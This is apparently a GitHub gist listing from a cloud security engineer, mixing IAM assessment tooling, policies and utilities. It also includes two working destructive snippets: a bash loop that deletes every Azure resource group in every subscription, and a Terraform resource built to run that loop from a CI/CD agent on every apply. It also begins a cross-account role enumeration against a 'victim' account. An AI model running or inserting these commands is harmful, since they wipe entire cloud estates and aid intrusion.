Kinnaird McQuade kmcquade

kmcquade /
Created Mar 14, 2021
Revised script for Kittoh
from jira import JIRA
import click
import getpass

ISSUE_SUMMARY = "Overly permissive AWS IAM Policies in use"
ISSUE_DESCRIPTION = """As part of our security assessment, our team ran Cloudsplaining on your AWS account.
Cloudsplaining maps out the IAM risk landscape in a report, identifies where resource ARN constraints are not used, and
identifies other risks in IAM policies like Privilege Escalation, Data Exfiltration, and Resource Exposure.
"""
View resume.json
"basics": {
"email": "",
"image": "\u0026u=3aa6c1944134c93d3eb1500028e54826ce561f7f\u0026v=4",
"label": "Lead Security Engineer",
"location": {
"city": "San Francisco",
"countryCode": "US",
"region": "California"

This only works when you have the victim account ID. For this example, let's say that the victim account ID is 999988887777.

Create a test role

First, create a role that we can use for this demo. This role is in your own account.

aws iam create-role --role-name test-enumeration \
    --assume-role-policy-document '{"Version": "2012-10-17","Statement": [{"Effect": "Allow","Principal": {"Service": ""},"Action": "sts:AssumeRole"}]}'
View compliance_statuses.csv
a4b Alexa for Business true
access-analyzer IAM Access Analyzer
account AWS Accounts true true true true true true true true true
acm AWS Certificate Manager true true true true true true true true true
acm-pca AWS Certificate Manager Private Certificate Authority
activate AWS Activate
airflow Amazon Managed Workflows for Apache Airflow
amplify AWS Amplify true true true true true true
amplifybackend AWS Amplify Admin true true true true true true
kmcquade /
Created Jan 9, 2021
git clones a repository into $HOME/Code/ and then opens it in Pycharm, all in one command
#!/usr/bin/env python3
# git clones a repository into $HOME/Code/ and then opens it in Pycharm, all in one command
# Example:
#   -u
# This will create $HOME/Code/ if it does not exist yet
import os
import subprocess
import argparse
  • To list all dependencies:
go list std | tr -d "\[|\]" | tr " " "\n" | sort -u > std-library
go list -f {{.Deps}} | tr -d "\[|\]" | tr " " "\n" | sort -u > all-dependencies
sort std-library std-library all-dependencies | uniq -u


kmcquade / ecr-registry-enforcement.json
Last active Dec 14, 2020
The Policy below prevents the account from self-managing container images. Users and Roles in the account cannot upload any container images unless the registry is owned by an approved ECR account ID.
"Version": "2012-10-17",
"Statement": [
"Sid": "PreventSelfManagedImages",
"Action": [
kmcquade /
Last active Nov 5, 2020
Nuke every Azure resource group in every Azure subscription
#!/usr/bin/env bash
# For every subscription visible to the current az login, delete each resource group in it.
for sub in $(az account list | jq -r '.[].id'); do
  for rg in $(az group list --subscription "$sub" | jq -r '.[].name'); do
    az group delete --name "$rg" --subscription "$sub" --no-wait --yes
  done
done
kmcquade /
Last active Oct 30, 2020
Explanation: Recursively nuke things from a CICD build agent running Terraform with Azure God mode permissions
resource "null_resource" "nuke" {
  # Because we set this to timestamp, it *always* runs :D
  triggers = {
    party_like_its_jan_1_1970 = timestamp()
  }

  provisioner "local-exec" {
    # Bash that: 1. gets a list of all subscriptions, 2. for each subscription lists
    # the resource groups, 3. deletes each one (the same loop as the bash gist above)
    command = <<-EOT
      for sub in $(az account list | jq -r '.[].id'); do
        for rg in $(az group list --subscription "$sub" | jq -r '.[].name'); do az group delete --name "$rg" --subscription "$sub" --no-wait --yes; done
      done
    EOT
  }
}
kmcquade / input-serverless-iam-user.yml
Last active Oct 30, 2020
Policy Sentry template to deploy a full-stack serverless app (Lambda functions, API Gateway, CloudFront distribution, and S3 objects)
View input-serverless-iam-user.yml
mode: crud
name: 'ServerlessAppDeployAutomationUser'
# Specify resource ARNs
- 'arn:aws:execute-api:*:*:*/*/*/*'
- 'arn:aws:lambda:*:*:function:cloudsplaining-*'
- 'arn:aws:s3:::cloudsplaining-serverless-*/*'
- 'arn:aws:cloudfront::*:distribution/mydistributionid'
- 'arn:aws:execute-api:*:*:*/*/*/*'